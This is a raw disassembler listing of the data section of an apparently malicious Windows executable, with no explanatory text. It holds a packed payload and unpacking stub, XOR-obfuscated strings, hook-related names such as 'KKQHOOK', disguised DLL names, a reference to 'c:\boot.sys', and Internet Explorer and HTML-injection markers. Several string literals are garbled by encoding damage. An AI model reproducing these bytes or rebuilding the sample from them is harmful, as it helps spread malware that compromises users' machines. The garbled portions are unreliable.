dd 0BB336961h, 0D7B70B6h, 0A37044D4h, 41175D65h, 7C08B14Ch
dd 0C1749551h, 6764B5DBh, 1176AD55h, 0A95B22DCh, 5074E2DAh
dd 0CC27158Bh, 0FEA870DDh, 667542BDh, 81C819D4h, 332CE425h
dd 0E496029h, 45725F4Bh, 6DEA8D0Ch, 63724100h, 0F685C5BDh
dd 0BAA3D6DAh, 0EF33226Eh, 0BC2AAB36h, 0AE69B7h, 0A033011Fh
dd 0CF6C3DE4h, 4136E55Ah, 256F4274h, 2D92B726h, 2B959980h
dd 8DDD662Bh, 70566548h, 156D3C79h, 15876422h, 0F9751D14h
dd 891F491Ah, 59532E0Dh, 4AC8A153h, 8901D5F1h, 2D17B618h
dd 1E69007h, 48041930h, 14B2C95Bh, 1304C04Fh, 53C0D743h
dd 5F9D56B4h, 0CDED4505h, 5340D034h, 5FB34FABh, 0FE788B05h
dd 4F0B46B9h, 0FEEF04BDh, 26C36D03h, 75D452Bh, 0B4EF473Fh
dd 19017210h, 1D733163h, 744F6C34h, 6735697Bh, 839B074Dh
dd 0D6C61AEh, 2B660D49h, 0B1BC4023h, 34B93BAEh, 62073903h
dd 75D064C7h, 171E751Dh, 736D2343h, 0C80D14B0h, 61812073h
dd 7418C188h, 20AF6B61h, 0F74D339Bh, 6307D13Dh, 79206F11h
dd 0E0C43D92h, 1407CF76h, 0DC0CC153h, 79533DF6h, 375DF34Fh
dd 54CF9DD6h, 6E2D4B33h, 520D6C05h, 7BAE066h, 137531C3h
dd 0E61D8DCFh, 4715119Eh, 631544CBh, 8DD74494h, 69797069h
dd 5B1F6E2Dh, 49B6F759h, 65215168h, 89055399h, 36B901h
dd 5881560Bh, 4B971C2Bh, 585EF32h, 0C8D8F307h, 2E373135h
dd 0C44F0700h, 74B06665h, 6ED561B7h, 90B6EBAFh, 2F2971E7h
dd 29671B4Ch, 0EEB1B84h, 8D79930Dh, 1021A367h, 13D9ECAEh
dd 0EB061B20h, 15A9BA1Ah, 530BF32h, 6233092Dh, 9B8ACEC2h
dd 3054770Ch, 6DC62F0Dh, 72C75164h, 0B38F7426h, 7D29576Fh
dd 8D830B6Bh, 1FD5CC34h, 69934F3Eh, 66126C09h, 0EF6E2FE7h
dd 0BAC1A461h, 5779072Eh, 75500D20h, 6C6E7C7h, 0B9425761h
dd 0C46F643Fh, 5C48BEE8h, 750F6F1Fh, 8CA2EF43h, 3A774525h
dd 212308BBh, 0DFE15B64h, 46CEE7DEh, 5F7553B7h, 61D2F569h
dd 44B7C26Ch, 5D43561Fh, 56E88709h, 6D842400h, 0B6E8C27Ah
dd 611F7315h, 0B00409A3h, 0CD90337Fh, 80A80315h, 0D034C433h
dd 0D55BDF34h, 0EE34FFFFh, 1B350F34h, 39352A35h, 0D135A635h
dd 0E035D735h, 6FFA32A7h, 6B36FF55h, 9B368A36h, 1099A436h
dd 1C378A37h, 0FF384638h, 3A17FFFFh, 38C3385Fh, 38FE38E2h
dd 39383928h, 394B3945h, 39B63965h, 39E639D3h, 0FFFF39F9h
dd 3A39FFFFh, 3A473A40h, 3A553A4Eh, 3A633A5Ch, 3A713A6Ah
dd 3A903A78h, 3AA83A9Fh, 3AF43AB1h, 0FFFF3B08h, 3B10FFFFh
dd 3B763B15h, 3C0C3B7Eh, 3C8C3C72h, 3D093C9Fh, 3DB03D31h
dd 3E3A3DB9h, 3E973E80h, 0AF8B3E9Eh, 3EBEFFFFh, 3F353F04h
dd 3F623F4Ch, 3F7D3F6Eh, 84F93FF0h, 0FFF27B10h, 20C066FFh
dd 11310530h, 39312A31h, 78316C31h, 98318931h, 2320C31h
dd 23FFFFC0h, 44332B33h, 0E333C233h, 13340B33h, 29341834h
dd 0FFDDFF8Fh, 0C13458FFh, 0FB34F334h, 29352134h, 81352E35h
dd 0E5CB8935h, 0FD35F335h, 23361635h, 0FFF77F46h, 39363036h
dd 58364136h, 82367C36h, 0DD36BADBh, 53384E36h, 0FFFFFF0Eh
dd 387D38FFh, 38B13890h, 39B1393Eh, 3A223A17h, 3A683A5Eh
dd 3AE83AC6h, 3B283B1Dh, 3B853B7Ch, 0FFFBBFB7h, 3C073BFEh
dd 3C703C68h, 3C803C76h, 3CE7B988h, 3D5D3D50h, 453E2E34h
dd 0FFFFFFFEh, 503E4A3Eh, 6E3E573Eh, 0CD3E783Eh, 613EDE3Eh
dd 853F6C3Fh, 0BF3F933Fh, 0DB3FCA3Fh, 0FF3FE93Fh, 0E81EEFFFh
dd 304CBFF4h, 30D93089h, 30F630DEh, 313A30FDh, 315B3141h
dd 2F103164h, 3194FFF4h, 31A8319Fh, 31F231ADh, 353F31F8h
dd 0FE1B1632h, 0C39E1ADFh, 34BA34AAh, 34D734CBh, 8D203508h
dd 3780356Eh, 3586FE00h, 35A535A0h, 37482778h, 0EDF00076h
dd 380E0F0Dh, 5038A72Ch, 0B7FF6838h, 0CB51BFFFh, 19391438h
dd 26392039h, 34392C39h, 39610039h, 39853976h, 399F398Dh
dd 0EE0B001Bh, 0CBAC39A7h, 0ED17D099h, 0FD5BFE00h, 0FA39F539h
dd 3A4BFF39h, 3A183A10h, 0FF743A1Eh, 1937FFFFh, 3B423AB3h
dd 3B813B73h, 3BAE3BA8h, 3BBA3BB4h, 3BC63BC0h, 3BD23BCCh
dd 2FFF3BD8h, 3BDEFFFDh, 3BEA3BE4h, 3DA23BF0h, 3DF33DEEh
dd 143E0FA0h, 303E213Eh, 423E353Eh, 0FFFFC006h, 563E513Eh
dd 723E603Eh, 893E813Eh, 3D3E903Eh, 0C02B473Fh, 83F001BFh
dd 0A629913Fh, 0C43FBC3Fh, 19FFD53Fh, 0F32D06DBh, 15DF30F3h
dd 1F301A30h, 0F8242430h, 2930EDB7h, 0F5350030h, 65303F30h
dd 1F306A30h, 9EC7E6h, 4931424Eh, 40601997h, 1A2FA06h
dd 4473458Dh, 49FE73F8h, 706802ECh, 3220FB6Bh, 4B5C302Eh
dd 809E268Bh, 5C775C17h, 120F4F0h, 64705505h, 95C4B162h
dd 0AA4EA704h, 0D43BFE77h, 42095A6Ah, 6174536Bh, 5307472h
dd 72476F9Ch, 0D670756Fh, 0A41780Ah, 82C11FACh, 0D7347405h
dd 50167618h, 0D55C7643h, 205B6E73h, 0D7000D01h, 1ED709Fh
dd 6F977EDEh, 1D00BA1Dh, 903E08F6h, 575D155Ch, 4640323Ch
dd 0FB590660h, 2A1F4523h, 0F6338008h, 177EFF85h, 15197F18h
dd 1E285C66h, 7CF73B46h, 0F30AA423h, 3B2480E9h, 4362FEE0h
dd 40101CF2h, 0C131800h, 61765468h, 73C6C9BEh, 0E6A1114h
dd 813E4810h, 1028E054h
dd 0C2A90040h, 1448EE74h, 0E7E04C1Bh, 5660A306h, 90F54C6h
dd 5AF736A3h, 20054910h, 9C4F4004h, 67FB6405h, 20345931h
dd 4C9C64BDh, 0BE57F6C9h, 0C6A49C9Ch, 0A481CF25h, 0F7D068C0h
dd 0D8799Fh, 683A6816h, 0BE0A6ABBh, 0F3482394h, 8D597FDDh
dd 0A5F3AC7Dh, 0B84BEA4h, 0A5D87D8Dh, 0B19E7CA5h, 0F5F0C11Bh
dd 0E80A74BEh, 76EBB76Ch, 0E4A5F847h, 0A40B6468h, 99BEACE6h
dd 553E205Dh, 0C1692480h, 0B0016A7Bh, 14EC7457h, 35196A0Fh
dd 9E2350Fh, 831FF89Bh, 61C94CC4h, 0E19CCD92h, 6AF8DF08h
dd 6CD437F5h, 400544A6h, 0F80D4A9h, 0F7617385h, 0EFBCBE9Dh
dd 96F26604h, 0F7BAFF00h, 0C64420Eh, 14EC358Bh, 6767F4FEh
dd 1AD64630h, 47831903h, 0C2EEBF78h, 3C305204h, 1105842Ah
dd 6159010Eh, 1E67D98Bh, 39EC6859h, 1342A20h, 0F3C868h
dd 0AD7210FFh, 13DE1A7Ch, 0EA60385Ah, 74C3640Ah, 76E0349Fh
dd 30AFD404h, 0EFEF112Eh, 8D047B2Ch, 0FF68D68Dh, 562898D0h
dd 1DEFBF0Ah, 6C51204Dh, 0B55FBBh, 0C0968B59h, 962A3635h
dd 144876A7h, 570950DDh, 2D1E04B6h, 27D8DEAh, 80EFF33h
dd 0B45420F9h, 575DB023h, 57B01D24h, 2057359h, 0CC51h
dd 0A0286016h, 41101B70h, 3C61019Ch, 0C4061801h, 44015C21h
dd 80C03100h, 0BA0ABA42h, 773E9384h, 310400F9h, 0A6922030h
dd 57908824h, 88040155h, 10B2031h, 2090E292h, 1D4010Eh
dd 0B2C40656h, 20904C04h, 6D3EE606h, 1212F125h, 41168844h
dd 0D25CD830h, 0B27B7DE3h, 4456460Ah, 5580B667h, 8A368510h
dd 69C443ECh, 7301315Ch, 165F2006h, 10C54h, 0E12F20F2h
dd 6E010F79h, 0B078D565h, 80C122A0h, 5810CE2h, 21F8DF5h
dd 0E054840Ch, 837A744Eh, 41957ACh, 96046817h, 0B05F5059h
dd 2EB906Ch, 206C510Ch, 7B2CFD48h, 0BC000000h, 71BFh, 1200h
dd 0BE6000FFh, 406000h, 0B000BE8Dh, 8357FFFFh, 10EBFFCDh
dd 90909090h, 68A9090h, 47078846h, 775DB01h, 0EE831E8Bh
dd 72DB11FCh, 1B8EDh, 0DB010000h, 1E8B0775h, 11FCEE83h
dd 1C011DBh, 75EF73DBh, 831E8B09h, 0DB11FCEEh, 0C931E473h
dd 7203E883h, 8E0C10Dh, 8346068Ah, 7474FFF0h, 0DB01C589h
dd 1E8B0775h, 11FCEE83h, 1C911DBh, 8B0775DBh, 0FCEE831Eh
dd 0C911DB11h, 1412075h, 8B0775DBh, 0FCEE831Eh, 0C911DB11h
dd 0EF73DB01h, 1E8B0975h, 11FCEE83h, 83E473DBh, 0FD8102C1h
dd 0FFFFF300h, 8D01D183h, 0FD832F14h, 8A0F76FCh, 7884202h
dd 0F7754947h, 0FFFF63E9h, 28B90FFh, 8904C283h, 4C78307h
dd 7704E983h, 0E9CF01F1h, 0FFFFFF4Ch, 0B9F7895Eh, 11Ah
dd 2C47078Ah, 77013CE8h, 43F80F7h, 78BF275h, 66045F8Ah
dd 0C108E8C1h, 0C48610C0h, 0EB80F829h, 89F001E8h, 5C78307h
dd 0D9E2D889h, 7000BE8Dh, 78B0000h, 3C74C009h, 8D045F8Bh
dd 90003084h, 0F3010000h, 8C78350h, 905096FFh, 8A950000h
dd 0C0084707h, 0F989DC74h, 0AEF24857h, 5496FF55h, 9000090h
dd 890774C0h, 4C38303h, 96FFE1EBh, 9058h, 0DF61E961h, 0FFFFh
dd 25h dup(0)
dd 0A0700000h, 0A0500000h, 3 dup(0)
dd 0A07D0000h, 0A0600000h, 3 dup(0)
dd 0A08A0000h, 0A0680000h, 5 dup(0)
dd 0A0940000h, 0A0A20000h, 0A0B20000h, 0
dd 0A0C00000h, 0
dd 0A0CE0000h, 0
dd 454B0000h, 4C454E52h, 442E3233h, 41004C4Ch, 50415644h
dd 2E323349h, 6C6C64h, 4356534Dh, 642E5452h, 6C6Ch, 64616F4Ch
dd 7262694Ch, 41797261h, 65470000h, 6F725074h, 64644163h
dd 73736572h, 78450000h, 72507469h, 7365636Fh, 73h, 43676552h
dd 65736F6Ch, 79654Bh, 61720000h, 646Eh, 4Bh dup(0)
dd 2, 0Ah
dword_446458 dd 0 ; sub_4082AB:loc_4082D9�r ...
dword_44645C dd 56306Fh aCBoot_sys db 'c:\boot.sys',0 ; DATA XREF: sub_40844F+27�o
aRi db 'rI',0 ; DATA XREF: sub_40844F+3A�o
byte_44646F db 50h ; DATA XREF: sub_40844F+A6�o
dd 82707F6Dh
db 66h, 25h, 0
byte_446477 db 4Bh ; DATA XREF: sub_40844F+B9�o
dd 48h
dword_44647C dd 11h, 0Fh dup(0)dword_4464BC dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_408741+10�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh, 8, 0Ah
dword_446504 dd 0 ; .text:loc_4085D4�r ...
dd 3
dword_44650C dd 0Eh dword_446510 dd 0 ; .text:loc_4086D3�r ...
a@8wz db ' @8WZ',0 ; DATA XREF: sub_408779+14�o
dword_44651A dd 20374Bh word_44651E dw 574Fh ; DATA XREF: sub_408779+77�o
db 0
word_446521 dw 30h ; DATA XREF: sub_408779:loc_40882F�r
align 4
dd 5, 0Ah
dword_44652C dd 0 ; .text:loc_4088DE�r ...
aVlvh__0 db 'vlVh_',0 ; DATA XREF: sub_40893E+11�o
align 4
dword_446538 dd 0FFFFFFFFh dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
aHu db ': hu',0 ; DATA XREF: sub_40893E+44�o
a1bOt db '/1~oT:',0 ; DATA XREF: sub_40893E+9D�o
byte_446945 db 3 dup(0) ; DATA XREF: sub_40893E+F1�o
off_446948 dd offset loc_4089D5 ; DATA XREF: sub_40893E+88�r
dd offset loc_4089E8
dd offset loc_408A13
dd offset loc_408A4A
dword_446958 dd 7 dd 0Ah
dword_446960 dd 0 ; sub_408AB9:loc_408AE8�r ...
dword_446964 dd 2B5240h word_446968 dw 41h ; DATA XREF: sub_408B4C+B8�r
a99a_0 db '-; 99a',0 ; DATA XREF: sub_408B4C+14B�o
dword_446971 dd 505866h dword_446975 dd 505E55h asc_446979 db ';',27h,'*l & ',0 ; DATA XREF: sub_408E12+16�o
aHjvmnia db 'hJVmnIA',0 ; DATA XREF: sub_408E12+61�o
aP_rX db 'p+_R',27h,'X',0 ; DATA XREF: sub_408E12+A7�o
aFxTE db 'fX $t!E',0 ; DATA XREF: sub_408ED0+E7�o
aQa db 'qA',0 ; DATA XREF: sub_408ED0+207�o
byte_44699B db 0 ; DATA XREF: sub_408ED0+31B�o
aZ_y9am4 db 'z.y9aM4',0 ; DATA XREF: sub_408ED0+63B�o
a3h db '3h',0 ; DATA XREF: sub_408ED0+739�o
aOi6 db ' oi%6',0 ; DATA XREF: sub_408ED0+827�o
dword_4469AD dd 2E3B72h a@gduN db '@GDu N!',0 ; DATA XREF: sub_408ED0+866�o
aG_ db 'G!_`',0 ; DATA XREF: sub_408ED0+8BE�o
word_4469BE dw 4E7Fh ; DATA XREF: sub_408ED0+92F�o
dd 307F7Ch
word_4469C4 dw 7Fh ; DATA XREF: sub_4098A8+15�r
a2gtF db '2GT<!f',0 ; DATA XREF: sub_4098A8+28�o
aNjbS9 db 'NJb s9',0 ; DATA XREF: sub_4098A8+3B�o
byte_4469D4 db 0 ; DATA XREF: sub_4098A8+4E�o
dword_4469D5 dd 4A7180h a_3v db '. 3',0 ; DATA XREF: sub_4098A8+6A�o
byte_4469DE db 0 ; DATA XREF: sub_4098A8+99�o
aSiYy db '<si+yY',0 ; DATA XREF: sub_4098A8+107�o
byte_4469E6 db 0 ; DATA XREF: sub_4098A8+1A7�o
asc_4469E7 db '*/',0 ; DATA XREF: sub_4098A8+20B�o
aOcqud db 'ocqUd',0 ; DATA XREF: sub_4098A8+367�o
word_4469F0 dw 68h ; DATA XREF: sub_4098A8:loc_409C42�r
word_4469F2 dw 6Dh ; DATA XREF: sub_4098A8+3F3�r
dword_4469F4 dd 39572Ch aMB7d db 'M;$:7d',0 ; DATA XREF: sub_4098A8+54D�o
dword_446A00 dd 4E314Fh dword_446A04 dd 36307F57h db 6Ch, 61h, 0
aUw db 'UW|',27h,0 ; DATA XREF: sub_4098A8+833�o
aP2 db '>:= P2',0 ; DATA XREF: sub_4098A8+8D7�o
dword_446A18 dd 6A2082h aQ db '^:$q',0 ; DATA XREF: sub_4098A8+C40�o
dword_446A21 dd 384E42h dword_446A25 dd 6C3020h byte_446A29 db 0 ; DATA XREF: sub_4098A8+D04�o
word_446A2A dw 7Eh ; DATA XREF: sub_4098A8+DB4�r
aV_ngv db 'V_Ngv+',0 ; DATA XREF: sub_4098A8+EA6�o
dword_446A33 dd 3F3C45h byte_446A37 db 0 ; DATA XREF: sub_4098A8+10ED�o
word_446A38 dw 4Eh ; DATA XREF: sub_40AA24+1B�r
dword_446A3A dd 4D2065h aAg9 db ' 9',0 ; DATA XREF: sub_40AA24+1E9�o
aDpuayyf db 'DpUyYF',0 ; DATA XREF: sub_40AA24+23F�o
aWq6ug db 'wq6Ug',0 ; DATA XREF: sub_40AA24+24D�o
aRf db 'rf',0 ; DATA XREF: sub_40AA24+325�o
word_446A54 dw 42h ; DATA XREF: sub_40AA24+364�r
a16xYi_ db '16X<Yi_',0 ; DATA XREF: sub_40AA24+540�o
dword_446A5E dd 6B3377h word_446A62 dw 3E49h ; DATA XREF: sub_40AA24+62A�o
dd 20207F55h
db 0
byte_446A69 db 40h, 7Ch, 0 ; DATA XREF: sub_40AA24+6AD�o
aAH@2du db '$H@2dU',0 ; DATA XREF: sub_40AA24+733�o
word_446A74 dw 26h ; DATA XREF: sub_40AA24+759�r
word_446A76 dw 5A42h ; DATA XREF: sub_40AA24+78C�o
db 0
byte_446A79 db 80h, 40h, 0 ; DATA XREF: sub_40AA24+862�o
dword_446A7C dd 2F206Dh dword_446A80 dd 23302Fh aPB6 db 'p|b6',0 ; DATA XREF: sub_40B2CA+E8�o
off_446A89 dd offset byte_444E5F ; DATA XREF: sub_40B3E8+188�r
aAhAq db ' *h&q',0 ; DATA XREF: sub_40B3E8+304�o
aGjvry db 'gjVRy',0 ; DATA XREF: sub_40B3E8+327�o
dword_446A9B dd 387547h byte_446A9F db 72h ; DATA XREF: sub_40B3E8+486�o
db 20h, 0
dword_446AA2 dd 20762Bh word_446AA6 dw 773Bh ; DATA XREF: sub_40B3E8+68B�o
db 0
word_446AA9 dw 2Dh ; DATA XREF: sub_40B3E8+724�r
byte_446AAB db 2Bh ; DATA XREF: sub_40B3E8+7B8�o
dd 7F4A5Eh
aV@zc db 'v@zc',0 ; DATA XREF: sub_40B3E8+813�o
align 4
asc_446AB8 db '',0 ; DATA XREF: sub_40B3E8+7C7�o
asc_446ABA db '',0 ; DATA XREF: sub_40B3E8+6F6�o
byte_446ABD db 81h, 0BAh, 0B5h ; DATA XREF: sub_40B3E8+5F9�o
dd 0F4B1B8B6h, 0B5F4BBA0h, 0BBBCA0A1h, 0B1AEBDA6h
db 0
byte_446AD1 db 81h, 0BAh, 0B5h ; DATA XREF: sub_40B3E8+5E7�o
dd 0F4B1B8B6h, 0B5F4BBA0h, 0BBBCA0A1h, 0B1AEBDA6h, 9DF4F9F4h
dd 869B979Ah, 80979186h, 9A9D84F4h, 0B884F4FAh, 0B1A7B5B1h
dd 0BBB7F4F8h, 0B7B1A6A6h
db 0A0h, 0FAh, 0
byte_446B07 db 0F1h ; DATA XREF: sub_40B3E8+43C�o
dd 0A7F1F9A7h
db 0
byte_446B0D db 84h, 0B8h, 0B1h ; DATA XREF: sub_40B3E8+406�o
dd 0F8B1A7B5h, 0B8B1A7F4h, 0F4A0B7B1h, 0BDA4AC91h, 0BDA0B5A6h
dd 8DF4BABBh, 0A6B5B1h
dword_446B2C dd 0F1F4A7F1h ; sub_40B3E8+639�o
db 0A7h, 0
word_446B32 dw 0B884h ; DATA XREF: sub_40B3E8+387�o
dd 0B1A7B5B1h, 0B1A7F4F8h, 0A0B7B1B8h, 0A4AC91F4h, 0A0B5A6BDh
dd 0F4BABBBDh, 0A0BABB99h
db 0BCh, 0
word_446B52 dw 0A7F1h ; DATA XREF: sub_40B3E8+337�o
db 0
byte_446B55 db 97h, 98h, 87h ; DATA XREF: sub_40AA24+768�o
dd 0F188909Dh, 0BA9D88A7h, 0B7BBA684h, 0A2A6B187h, 0E6E7A6B1h
db 0
byte_446B6D db 82h, 0 ; DATA XREF: sub_40AA24+73D�o
byte_446B6F db 9Fh ; DATA XREF: sub_40AA24+716�o
db 0
aZAgJIsJZAigGzi db ''
; DATA XREF: sub_40AA24+6DE�o
db '',0
aJZaJzJvDjZz db '',0 ; DATA XREF: sub_40AA24+5F2�o
word_446BCE dw 0B1BFh ; DATA XREF: sub_40AA24+5DE�o
dd 0B8B1BAA6h, 0B0FAE6E7h
db 2 dup(0B8h), 0
byte_446BDB db 88h ; DATA XREF: sub_40AA24+4B3�o
dd 0A0BBBBB6h, 0A7ADA7FAh
db 0
byte_446BE5 db 0F1h, 0A7h, 88h ; DATA XREF: sub_40AA24+467�o
dd 0B2B0ACB0h, 0FAA2B8AEh, 0A0B5B0h
aDatkkq32_dll db 'datkkq32.dll',0 ; DATA XREF: sub_40AA24+440�o
aDnkkq_dll db 'dnkkq.dll',0 ; DATA XREF: sub_40AA24+41A�o
aKkq32_dll db 'kkq32.dll',0 ; DATA XREF: sub_40AA24+3F4�o
byte_446C15 db 0F1h, 0A7h, 88h ; DATA XREF: sub_40AA24+3EA�o
; sub_40AA24+410�o ...
db 0F1h, 0A7h, 0
byte_446C1B db 0F1h ; DATA XREF: sub_40AA24+2FF�o
dd 0A7F188A7h, 0B1ACB1FAh
db 0
aZ_1 db '',0 ; DATA XREF: sub_40AA24+A6�o
byte_446C2F db 88h ; DATA XREF: sub_40AA24+4D�o
dd 0A2BDA6B0h, 88A7A6B1h, 0A7BDB0BAh, 0A7FAB0A6h, 0A7ADh
dbl_446C44 dq 1.2 ; DATA XREF: sub_4098A8+1002�r
dword_446C4C dd 0A6B2BDE8h, 0F4B1B9B5h, 0E9B7A6A7h, 0A4A0A0BCh, 0F1FBFBEEh
; DATA XREF: sub_4098A8+EBC�o
dd 0FBE8EAA7h, 0B5A6B2BDh, 0EAB1B9h
aSA db '輠',0 ; DATA XREF: sub_4098A8+DFB�o
byte_446C73 db 0B0h ; DATA XREF: sub_4098A8+D86�o
dd 0F4A7BBB0h
db 0
aGvJ db '',0 ; DATA XREF: sub_4098A8+D45�o
aMC db '',0 ; DATA XREF: sub_4098A8+CBA�o
dword_446C84 dd 0B0A4A1A3h db 0F4h, 0
word_446C8A dw 0A7F1h ; DATA XREF: sub_4098A8+BAA�o
dd 0F497FBF4h
db 0F1h, 0A7h, 0
byte_446C93 db 88h ; DATA XREF: sub_4098A8+B78�o
dd 0B9B9BBB7h, 0FAB0BAB5h, 0B9BBB7h
dword_446CA0 dd 0B788A7F1h, 0B5B9B9BBh, 0A4FAB0BAh db 0BDh, 0B2h, 0
byte_446CAF db 88h ; DATA XREF: sub_4098A8+B1A�o
dd 0FAB0B9B7h, 0B1ACB1h
dword_446CB8 dd 0B788A7F1h, 0A4FAB0B9h db 0BDh, 0B2h, 0
byte_446CC3 db 0EEh ; DATA XREF: sub_4098A8+A5E�o
dd 0A1E6E4F1h
db 0
aIDsc db '밹',0 ; DATA XREF: sub_4098A8+933�o
dword_446CD0 dd 0F188A7F1h, 0B9A0FAA7h db 0A4h, 0
word_446CDA dw 0A4A3h ; DATA XREF: sub_4098A8+4F0�o
dd 0F4A0A7h
byte_446CE0 db 0A5h, 0 ; DATA XREF: sub_4098A8+272�o
; sub_4098A8+616�o ...
word_446CE2 dw 0BDEBh ; DATA XREF: sub_4098A8+21A�o
dd 0F1E9B7B2h
db 0A1h, 0
word_446CEA dw 0B2BDh ; DATA XREF: sub_4098A8+1C6�o
; sub_4098A8+31B�o
db 0B7h, 0
aZAgJIsJZAigGz db '',0 ; DATA XREF: sub_4098A8+1B4�o
; sub_4098A8+309�o
byte_446D09 db 0FBh, 0A3h, 0B7h ; DATA XREF: sub_4098A8+171�o
dd 0A4FAB2B1h
db 0BCh, 0A4h, 0
byte_446D13 db 0FBh ; DATA XREF: sub_4098A8+13C�o
db 0
byte_446D15 db 0BCh, 2 dup(0A0h) ; DATA XREF: sub_4098A8+116�o
dd 0FBFBEEA4h
db 0F1h, 0A7h, 0
byte_446D1F db 0F1h ; DATA XREF: sub_4098A8+BB�o
; sub_4098A8+5E6�o ...
dd 0A7F188A7h, 0A0B5B0FAh
db 0
byte_446D29 db 97h, 0B8h, 0BDh ; DATA XREF: sub_408ED0+773�o
dd 9BF4BFB7h, 0F4B1B7BAh, 97F4BB80h, 0BDA0BABBh, 0B1A1BAh
aCbaai db '',0 ; DATA XREF: sub_408ED0+761�o
aSraa db '',0 ; DATA XREF: sub_408ED0+667�o
; sub_408ED0+6D7�o
dword_446D4C dd 0B5B1B884h, 0B9F4B1A7h, 0F4B1BFB5h, 0A6A6BBB7h, 0BDA0B7B1h
; DATA XREF: sub_408ED0+5C0�o
dd 0F4A7BABBh, 0F4B0BAB5h, 0F4ADA6A0h, 0BDB5B3B5h
db 0BAh, 0FAh, 0
byte_446D73 db 81h ; DATA XREF: sub_408ED0+547�o
dd 0B8B6B5BAh, 0BBA0F4B1h, 0A0A1B5F4h, 0BDA6BBBCh, 0F4FAB1AEh
dd 0F4998095h, 0F99A9D84h, 0B1B0BB97h, 0F4A7BDF4h, 0A1A5B1A6h
dd 0B0B1A6BDh, 0F4BBA0F4h, 0A4B9BBB7h, 0B1A0B1B8h, 0B1BCA0F4h
dd 0B5A6A0F4h, 0B7B5A7BAh, 0BABBBDA0h
db 0FAh, 0
word_446DBE dw 8095h ; DATA XREF: sub_408ED0+4D2�o
dd 9D84F499h, 0BB97F99Ah
db 0B0h, 0B1h, 0
byte_446DCB db 91h ; DATA XREF: sub_408ED0+460�o
dd 0A6BDA4ACh, 0BBBDA0B5h, 0B5B0F4BAh
db 0A0h, 0B1h, 0
byte_446DDB db 8Dh ; DATA XREF: sub_408ED0+3EA�o
dd 0F4A6A1BBh, 0B0A6B5B7h, 0B9A1BAF4h, 0A6B1B6h
dword_446DEC dd 0FAF1E4E6h db 0E6h, 0A1h, 0
byte_446DF3 db 0F1h ; DATA XREF: sub_408ED0+328�o
dd 0A1E6FAh
aCiscicim db '',0 ; DATA XREF: sub_408ED0+22B�o
; sub_408ED0+289�o
byte_446E01 db 0DEh, 2 dup(0F4h) ; DATA XREF: sub_408ED0+103�o
dd 0A0A195F4h, 0BDA6BBBCh, 0BDA0B5AEh, 92F4BABBh, 0B1B8BDB5h
db 0B0h, 0FAh, 0
aZaxaac db '',0 ; DATA XREF: sub_408ED0+F1�o
; sub_408ED0+15E�o ...
aKkqhook db 'KKQHOOK',0 ; DATA XREF: sub_408ED0+CD�o
; sub_4098A8+288�o ...
db 0
aSmdJJ db '',0 ; DATA XREF: sub_408ED0+3A�o
; sub_40B3E8+C1�o
aRIA db '',0 ; DATA XREF: sub_408ED0+1E�o
; sub_40B3E8+9E�o
word_446E3E dw 0D3C6h ; DATA XREF: sub_408B4C+177�o
dd 0F6EAE2FFh, 0B4FFE8F5h, 0BAFFE2FFh
db 0
byte_446E4D db 0CAh, 0FBh, 0EEh ; DATA XREF: sub_408B4C+F4�o
db 0F2h, 0
word_446E52 dw 0F5C9h ; DATA XREF: sub_408B4C+DF�o
dd 0FBEDEEFCh, 0D7C6FFE8h, 0F5E8F9F3h, 0EEFCF5E9h, 0BADFD3C6h
dd 0EFEEFFC9h, 0FFC9C6EAh, 0EAEFEEh
dword_446E74 dd 0F7EEF2B4h db 0
byte_446E79 db 66h, 59h, 57h ; DATA XREF: sub_40844F+FE�o
dd 425F145Eh, 79151A5Fh, 5B4E491Ah, 591A4E48h, 55586600h
dd 49144E55h
db 43h, 49h, 0
byte_446E97 db 1Fh ; DATA XREF: sub_40844F+D9�o
dd 57596649h, 534A145Eh
db 5Ch, 0
word_446EA2 dw 5166h ; DATA XREF: sub_40833E+71�o
dd 5F54485Fh, 14080956h, 56565Eh
byte_446EB0 db 0F0h, 0F7h, 0 ; DATA XREF: sub_408048+229�o
aTtSsSkPs db 'ӚӜ',0 ; DATA XREF: sub_406D2E+F05�o
aTtSs db 'Ӛ',0 ; DATA XREF: sub_406D2E+ED8�o
asc_446ECB db '',0 ; DATA XREF: sub_406D2E+E6B�o
asc_446ECD db '',0 ; DATA XREF: sub_406D2E+DE9�o
aE db 'إ',0 ; DATA XREF: sub_406D2E+D83�o
aB_0 db '',0 ; DATA XREF: sub_406D2E+6CF�o
aPVEPVE db 'إлإ',0 ; DATA XREF: sub_406D2E+625�o
aNPVE db 'лإ',0 ; DATA XREF: sub_406D2E+5DC�o
aName: ; DATA XREF: sub_406D2E+3D�o
unicode 0, <name>,0
align 4
aValue: ; DATA XREF: sub_406D2E+2D�o
unicode 0, <value>,0
unk_446F14 db 5Bh ; [ ; DATA XREF: sub_406A40+A8�o
db 7Fh, 75h, 64h
aYeypb6_xbsdxsb db 'yeypb6_xbsdxsb6Snfzydsd',0
a9ba05972F6a811: ; DATA XREF: sub_40696D+34�o
unicode 0, <{9BA05972-F6A8-11CF-A442-00A0C90A8F39}>,0
aHtml db '<HTML><!--',0 ; DATA XREF: sub_4061F7+4E4�o
; sub_4061F7+4EF�o ...
aXOkrecv11 db 'X-okRecv11',0 ; DATA XREF: sub_4061F7+422�o
aUyznQy db 'uyzN]QY',0 ; DATA XREF: sub_4061F7+389�o
dword_446F9C dd 49194F19h, 711C111Ch, 534E5F55h, 485A534Fh, 4852751Ch
; DATA XREF: sub_4061F7+340�o
dd 59524E59h, 44791C48h, 4E53504Ch
